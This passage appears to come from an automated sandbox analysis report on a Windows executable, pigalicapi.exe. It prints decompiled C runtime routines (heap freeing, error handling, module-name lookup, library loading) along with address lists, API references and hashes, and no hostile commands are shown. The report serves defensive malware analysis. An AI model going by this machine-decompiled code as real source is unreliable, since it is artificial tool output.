                                                                                                                                                                                                                                                                            0x00c79eeb
                                                                                                                                                                                                                                                                            0x00c79ef9
                                                                                                                                                                                                                                                                            0x00c79f05
                                                                                                                                                                                                                                                                            0x00c79f08
                                                                                                                                                                                                                                                                            0x00c79f0b
                                                                                                                                                                                                                                                                            0x00c79f1d
                                                                                                                                                                                                                                                                            0x00c79f22
                                                                                                                                                                                                                                                                            0x00c79f24
                                                                                                                                                                                                                                                                            0x00c79f2f
                                                                                                                                                                                                                                                                            0x00c79f35
                                                                                                                                                                                                                                                                            0x00c79f3d
                                                                                                                                                                                                                                                                            0x00c79f3f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c79f26
                                                                                                                                                                                                                                                                            0x00c79f26
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c79f26
                                                                                                                                                                                                                                                                            0x00c79f0d
                                                                                                                                                                                                                                                                            0x00c79f0d
                                                                                                                                                                                                                                                                            0x00c79f0e
                                                                                                                                                                                                                                                                            0x00c79f0e
                                                                                                                                                                                                                                                                            0x00c79f41
                                                                                                                                                                                                                                                                            0x00c79f42
                                                                                                                                                                                                                                                                            0x00c79f42
                                                                                                                                                                                                                                                                            0x00c79eed
                                                                                                                                                                                                                                                                            0x00c79ef3
                                                                                                                                                                                                                                                                            0x00c79ef7
                                                                                                                                                                                                                                                                            0x00c79f4a
                                                                                                                                                                                                                                                                            0x00c79f4b
                                                                                                                                                                                                                                                                            0x00c79f51
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c79ef7
                                                                                                                                                                                                                                                                            0x00c79f58

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00C79A4B,00C7A8F0,?,00C79E7E,00000001,00000364,?,00C74DA8,?), ref: 00C79ED9
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79F0E
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C79F35
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 00C79F42
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 00C79F4B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0915f43f6e94d8c9094f03ccdb81ed3de0cb192a1576ab8ff72f3b6d64441546
                                                                                                                                                                                                                                                                            • Instruction ID: f15e9e9a53bffd94b93cfe8908db78b1703a37b603a9aa7e11a9a1ce3241662d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0915f43f6e94d8c9094f03ccdb81ed3de0cb192a1576ab8ff72f3b6d64441546
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0001F9362487016BD71267A95C85B1F265EDBC6775730C026F42EE22A1EF70CD06A276
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00C7BDB3(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t21 = _a4;
                                                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                                                            					_t23 =  *_t21 -  *0xd0dae0; // 0xd0dad8
                                                                                                                                                                                                                                                                            					if(_t23 != 0) {
                                                                                                                                                                                                                                                                            						E00C7A8FB(_t7);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xd0dae4; // 0xd0df51
                                                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                                                            						E00C7A8FB(_t8);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xd0dae8; // 0xd0df51
                                                                                                                                                                                                                                                                            					if(_t25 != 0) {
                                                                                                                                                                                                                                                                            						E00C7A8FB(_t9);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xd0db10; // 0xd0dadc
                                                                                                                                                                                                                                                                            					if(_t26 != 0) {
                                                                                                                                                                                                                                                                            						E00C7A8FB(_t10);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                                                                                                                                                                                            					_t27 = _t6 -  *0xd0db14; // 0xd0df54
                                                                                                                                                                                                                                                                            					if(_t27 != 0) {
                                                                                                                                                                                                                                                                            						return E00C7A8FB(_t6);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _t6;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x00c7bdb9
                                                                                                                                                                                                                                                                            0x00c7bdbe
                                                                                                                                                                                                                                                                            0x00c7bdc2
                                                                                                                                                                                                                                                                            0x00c7bdc8
                                                                                                                                                                                                                                                                            0x00c7bdcb
                                                                                                                                                                                                                                                                            0x00c7bdd0
                                                                                                                                                                                                                                                                            0x00c7bdd4
                                                                                                                                                                                                                                                                            0x00c7bdda
                                                                                                                                                                                                                                                                            0x00c7bddd
                                                                                                                                                                                                                                                                            0x00c7bde2
                                                                                                                                                                                                                                                                            0x00c7bde6
                                                                                                                                                                                                                                                                            0x00c7bdec
                                                                                                                                                                                                                                                                            0x00c7bdef
                                                                                                                                                                                                                                                                            0x00c7bdf4
                                                                                                                                                                                                                                                                            0x00c7bdf8
                                                                                                                                                                                                                                                                            0x00c7bdfe
                                                                                                                                                                                                                                                                            0x00c7be01
                                                                                                                                                                                                                                                                            0x00c7be06
                                                                                                                                                                                                                                                                            0x00c7be07
                                                                                                                                                                                                                                                                            0x00c7be0a
                                                                                                                                                                                                                                                                            0x00c7be10
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7be18
                                                                                                                                                                                                                                                                            0x00c7be10
                                                                                                                                                                                                                                                                            0x00c7be1b

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BDCB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: HeapFree.KERNEL32(00000000,00000000,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?), ref: 00C7A911
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: GetLastError.KERNEL32(?,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?,?), ref: 00C7A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BDDD
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BDEF
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BE01
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C7BE13
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1d9733d4042b595ee02418ceaab4491a8d3f9b049b0731216ae90a0e3390ba6d
                                                                                                                                                                                                                                                                            • Instruction ID: 34904117d40d333258fd8fb4a382f15af88f9a7f228c697899bc6d2d7c1f9a6e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d9733d4042b595ee02418ceaab4491a8d3f9b049b0731216ae90a0e3390ba6d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5F01232604301AFC620EBA8F486E5A77EAAE44B50B658816F09CE7751CB30FDC28665
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                                                            			E00C8182C(signed int __ecx) {
                                                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                            				if((__ecx | 0xffffffff) == 0) {
                                                                                                                                                                                                                                                                            					_t7 =  *0xd0dad0; // 0x12ee898
                                                                                                                                                                                                                                                                            					if(_t7 != 0xd0d8b0) {
                                                                                                                                                                                                                                                                            						E00C7A8FB(_t7);
                                                                                                                                                                                                                                                                            						 *0xd0dad0 = 0xd0d8b0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				E00C7A8FB( *0xd0e804);
                                                                                                                                                                                                                                                                            				 *0xd0e804 = 0;
                                                                                                                                                                                                                                                                            				E00C7A8FB( *0xd0e808);
                                                                                                                                                                                                                                                                            				 *0xd0e808 = 0;
                                                                                                                                                                                                                                                                            				E00C7A8FB( *0xd0e5e8);
                                                                                                                                                                                                                                                                            				 *0xd0e5e8 = 0;
                                                                                                                                                                                                                                                                            				E00C7A8FB( *0xd0e5ec);
                                                                                                                                                                                                                                                                            				 *0xd0e5ec = 0;
                                                                                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x00c81835
                                                                                                                                                                                                                                                                            0x00c81839
                                                                                                                                                                                                                                                                            0x00c8183b
                                                                                                                                                                                                                                                                            0x00c81847
                                                                                                                                                                                                                                                                            0x00c8184a
                                                                                                                                                                                                                                                                            0x00c81850
                                                                                                                                                                                                                                                                            0x00c81850
                                                                                                                                                                                                                                                                            0x00c81847
                                                                                                                                                                                                                                                                            0x00c8185c
                                                                                                                                                                                                                                                                            0x00c81869
                                                                                                                                                                                                                                                                            0x00c8186f
                                                                                                                                                                                                                                                                            0x00c8187a
                                                                                                                                                                                                                                                                            0x00c81880
                                                                                                                                                                                                                                                                            0x00c8188b
                                                                                                                                                                                                                                                                            0x00c81891
                                                                                                                                                                                                                                                                            0x00c81899
                                                                                                                                                                                                                                                                            0x00c818a2

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C8184A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: HeapFree.KERNEL32(00000000,00000000,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?), ref: 00C7A911
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7A8FB: GetLastError.KERNEL32(?,?,00C7BE4A,?,00000000,?,00000000,?,00C7BE71,?,00000007,?,?,00C7AFE5,?,?), ref: 00C7A923
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C8185C
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C8186F
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C81880
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C81891
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: 139bcdf48b22ef91ac5d11c067b07a35cff36c0456489f201a4f3e6602eec315
                                                                                                                                                                                                                                                                            • Instruction ID: 5a65d34846fce7742612746b6dd9d85119662149b3067aa4cdb62cc9808cefaf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 139bcdf48b22ef91ac5d11c067b07a35cff36c0456489f201a4f3e6602eec315
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F03A708043218FD709AF14BC0A64C3BA5EB58724B198D1BF42DE23B1DB3009829FAA
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                                                            			E00C811F5(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				intOrPtr* _t35;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t42;
                                                                                                                                                                                                                                                                            				intOrPtr* _t43;
                                                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                                                            				WCHAR* _t48;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t49;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                                                                            				intOrPtr* _t56;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t61;
                                                                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 == 2 || _a4 == 1) {
                                                                                                                                                                                                                                                                            					GetModuleFileNameW(0, 0xd0e3c0, 0x104);
                                                                                                                                                                                                                                                                            					_t48 =  *0xd0e5f4; // 0x12e0fce
                                                                                                                                                                                                                                                                            					 *0xd0e5f8 = 0xd0e3c0;
                                                                                                                                                                                                                                                                            					if(_t48 == 0 ||  *_t48 == 0) {
                                                                                                                                                                                                                                                                            						_t48 = 0xd0e3c0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                                            					E00C81314(_t48, 0, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                            					_t61 = E00C8149A(_v8, _v16, 2);
                                                                                                                                                                                                                                                                            					if(_t61 != 0) {
                                                                                                                                                                                                                                                                            						E00C81314(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                            						if(_a4 != 1) {
                                                                                                                                                                                                                                                                            							_v12 = 0;
                                                                                                                                                                                                                                                                            							_push( &_v12);
                                                                                                                                                                                                                                                                            							_t49 = E00C81EDE(_t48, 0, _t61, _t61);
                                                                                                                                                                                                                                                                            							if(_t49 == 0) {
                                                                                                                                                                                                                                                                            								_t56 = _v12;
                                                                                                                                                                                                                                                                            								_t53 = 0;
                                                                                                                                                                                                                                                                            								_t35 = _t56;
                                                                                                                                                                                                                                                                            								if( *_t56 == 0) {
                                                                                                                                                                                                                                                                            									L15:
                                                                                                                                                                                                                                                                            									_t36 = 0;
                                                                                                                                                                                                                                                                            									 *0xd0e5e4 = _t53;
                                                                                                                                                                                                                                                                            									_v12 = 0;
                                                                                                                                                                                                                                                                            									_t49 = 0;
                                                                                                                                                                                                                                                                            									 *0xd0e5ec = _t56;
                                                                                                                                                                                                                                                                            									L16:
                                                                                                                                                                                                                                                                            									E00C7A8FB(_t36);
                                                                                                                                                                                                                                                                            									_v12 = 0;
                                                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                                                            									L14:
                                                                                                                                                                                                                                                                            									_t35 = _t35 + 4;
                                                                                                                                                                                                                                                                            									_t53 =  &(_t53->i);
                                                                                                                                                                                                                                                                            								} while ( *_t35 != 0);
                                                                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t36 = _v12;
                                                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *0xd0e5e4 = _v8 - 1;
                                                                                                                                                                                                                                                                            						_t42 = _t61;
                                                                                                                                                                                                                                                                            						_t61 = 0;
                                                                                                                                                                                                                                                                            						 *0xd0e5ec = _t42;
                                                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t43 = E00C79A46();
                                                                                                                                                                                                                                                                            						_push(0xc);
                                                                                                                                                                                                                                                                            						_pop(0);
                                                                                                                                                                                                                                                                            						 *_t43 = 0;
                                                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                                                            						_t49 = 0;
                                                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                                                            						E00C7A8FB(_t61);
                                                                                                                                                                                                                                                                            						return _t49;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t44 = E00C79A46();
                                                                                                                                                                                                                                                                            					_t62 = 0x16;
                                                                                                                                                                                                                                                                            					 *_t44 = _t62;
                                                                                                                                                                                                                                                                            					E00C7998A();
                                                                                                                                                                                                                                                                            					return _t62;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                                            0x00c81202
                                                                                                                                                                                                                                                                            0x00c81230
                                                                                                                                                                                                                                                                            0x00c81236
                                                                                                                                                                                                                                                                            0x00c8123c
                                                                                                                                                                                                                                                                            0x00c81244
                                                                                                                                                                                                                                                                            0x00c8124b
                                                                                                                                                                                                                                                                            0x00c8124b
                                                                                                                                                                                                                                                                            0x00c81250
                                                                                                                                                                                                                                                                            0x00c81257
                                                                                                                                                                                                                                                                            0x00c8125e
                                                                                                                                                                                                                                                                            0x00c81270
                                                                                                                                                                                                                                                                            0x00c81277
                                                                                                                                                                                                                                                                            0x00c81296
                                                                                                                                                                                                                                                                            0x00c812a2
                                                                                                                                                                                                                                                                            0x00c812bd
                                                                                                                                                                                                                                                                            0x00c812c0
                                                                                                                                                                                                                                                                            0x00c812c7
                                                                                                                                                                                                                                                                            0x00c812cd
                                                                                                                                                                                                                                                                            0x00c812d4
                                                                                                                                                                                                                                                                            0x00c812d7
                                                                                                                                                                                                                                                                            0x00c812d9
                                                                                                                                                                                                                                                                            0x00c812dd
                                                                                                                                                                                                                                                                            0x00c812e7
                                                                                                                                                                                                                                                                            0x00c812e7
                                                                                                                                                                                                                                                                            0x00c812e9
                                                                                                                                                                                                                                                                            0x00c812ef
                                                                                                                                                                                                                                                                            0x00c812f2
                                                                                                                                                                                                                                                                            0x00c812f4
                                                                                                                                                                                                                                                                            0x00c812fa
                                                                                                                                                                                                                                                                            0x00c812fb
                                                                                                                                                                                                                                                                            0x00c81301
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c812df
                                                                                                                                                                                                                                                                            0x00c812df
                                                                                                                                                                                                                                                                            0x00c812df
                                                                                                                                                                                                                                                                            0x00c812e2
                                                                                                                                                                                                                                                                            0x00c812e3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c812df
                                                                                                                                                                                                                                                                            0x00c812cf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c812cf
                                                                                                                                                                                                                                                                            0x00c812a8
                                                                                                                                                                                                                                                                            0x00c812ad
                                                                                                                                                                                                                                                                            0x00c812af
                                                                                                                                                                                                                                                                            0x00c812b1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c81279
                                                                                                                                                                                                                                                                            0x00c81279
                                                                                                                                                                                                                                                                            0x00c8127e
                                                                                                                                                                                                                                                                            0x00c81280
                                                                                                                                                                                                                                                                            0x00c81281
                                                                                                                                                                                                                                                                            0x00c812b6
                                                                                                                                                                                                                                                                            0x00c812b6
                                                                                                                                                                                                                                                                            0x00c81304
                                                                                                                                                                                                                                                                            0x00c81305
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c8130e
                                                                                                                                                                                                                                                                            0x00c8120a
                                                                                                                                                                                                                                                                            0x00c8120a
                                                                                                                                                                                                                                                                            0x00c81211
                                                                                                                                                                                                                                                                            0x00c81212
                                                                                                                                                                                                                                                                            0x00c81214
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c81219

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000104), ref: 00C81230
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C812FB
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C81305
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                            • String ID: C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                            • API String ID: 2506810119-3992108462
                                                                                                                                                                                                                                                                            • Opcode ID: 3234847e61deb794765e7c874e7c8ebd554306d4e0173ab53852e217cafa3478
                                                                                                                                                                                                                                                                            • Instruction ID: ceda8d20197037b3e805144d90b074583f28a8ade23477dd7d2700de02fa78d5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3234847e61deb794765e7c874e7c8ebd554306d4e0173ab53852e217cafa3478
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C318371A00218EFDB25EF9ADC85D9EBBFCEB85314B14406AF818D7311D6708E42DBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                                                            			E00C7A9D1(signed int _a4) {
                                                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                                                            				WCHAR* _t22;
                                                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t9 = _a4;
                                                                                                                                                                                                                                                                            				_t25 = 0xd0dd20 + _t9 * 4;
                                                                                                                                                                                                                                                                            				_t24 =  *_t25;
                                                                                                                                                                                                                                                                            				if(_t24 == 0) {
                                                                                                                                                                                                                                                                            					_t22 =  *(0xcc7a50 + _t9 * 4);
                                                                                                                                                                                                                                                                            					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                                                                                                                                                                                                            					if(_t27 != 0) {
                                                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                                                            						 *_t25 = _t27;
                                                                                                                                                                                                                                                                            						if( *_t25 != 0) {
                                                                                                                                                                                                                                                                            							FreeLibrary(_t27);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t13 = _t27;
                                                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                                                            						return _t13;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t15 = GetLastError();
                                                                                                                                                                                                                                                                            					if(_t15 != 0x57) {
                                                                                                                                                                                                                                                                            						_t27 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                                                                                                                                                                                                            						_t27 = _t15;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_t27 != 0) {
                                                                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						 *_t25 = _t15 | 0xffffffff;
                                                                                                                                                                                                                                                                            						_t13 = 0;
                                                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t4 = _t24 + 1; // 0xce6c4b52
                                                                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                            				return  ~_t4 & _t24;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x00c7a9d6
                                                                                                                                                                                                                                                                            0x00c7a9da
                                                                                                                                                                                                                                                                            0x00c7a9e1
                                                                                                                                                                                                                                                                            0x00c7a9e5
                                                                                                                                                                                                                                                                            0x00c7a9f3
                                                                                                                                                                                                                                                                            0x00c7aa09
                                                                                                                                                                                                                                                                            0x00c7aa0d
                                                                                                                                                                                                                                                                            0x00c7aa36
                                                                                                                                                                                                                                                                            0x00c7aa38
                                                                                                                                                                                                                                                                            0x00c7aa3c
